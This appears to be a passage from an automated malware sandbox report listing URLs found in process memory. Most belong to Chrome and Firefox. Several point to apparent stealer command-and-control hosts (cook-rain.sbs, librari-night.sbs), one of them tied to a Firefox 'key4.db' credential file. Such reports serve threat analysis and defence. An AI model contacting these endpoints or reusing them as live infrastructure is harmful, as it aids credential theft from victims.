Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/3u
Source: cfc45d1c7c.exe, 0000000C.00000003.2998396077.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3033495158.00000000013CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/7
Source: cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2938791730.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/B
Source: cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/Ps
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/So4
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/Vux
Source: cfc45d1c7c.exe, 0000000A.00000003.2719178360.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2938791730.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2669358178.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3028749334.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2967887265.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000134E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/api
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000132D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apiM
Source: cfc45d1c7c.exe, 0000000A.00000003.2648282111.0000000001357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apiN
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apih
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apipgrou?
Source: cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apirviceh
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693505617.00000000013B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/ata%
Source: cfc45d1c7c.exe, 0000000A.00000003.2648282111.0000000001357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/c
Source: cfc45d1c7c.exe, 0000000C.00000003.2998396077.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3033495158.00000000013CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/j
Source: cfc45d1c7c.exe, 0000000C.00000003.2967887265.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2998396077.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2976238691.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3033495158.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2965707647.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2964412218.00000000013CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/k
Source: cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/kI
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/nx
Source: cfc45d1c7c.exe, 0000000A.00000003.2748262926.00000000013DA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2748043293.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2748085898.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/ordVPNo
Source: cfc45d1c7c.exe, 0000000C.00000003.2964412218.00000000013BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/t
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/xM
Source: cfc45d1c7c.exe, 0000000A.00000003.2937966342.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2648282111.0000000001357000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3028749334.0000000001338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs:443/api
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.0000000001338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs:443/apiA
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.0000000001338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs:443/apix/fqs92o4p.default-release/key4.dbPK
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: chrome.exe, 00000010.00000002.2859323740.0000481C0251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000010.00000002.2860398543.0000481C02550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000010.00000002.2859323740.0000481C0251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000010.00000002.2859323740.0000481C0251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2862619011.0000481C02594000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3097355714.00000208775CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico64
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3366268374.000002087AD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3303782792.000002087AA79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hjx
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000010.00000002.2863128847.0000481C0260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2843890389.0000481C0220C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000010.00000002.2865803429.0000481C027CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2872669893.0000481C02C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000010.00000002.2828247792.0000147800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000010.00000002.2835363939.0000147800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2872669893.0000481C02C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000010.00000003.2789271480.00001478006E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000010.00000002.2832735666.0000147800744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/
Source: Lumma111.exe, 00000009.00000003.2584044251.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2590187575.0000000001003000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2584068726.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/3O
Source: Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/api
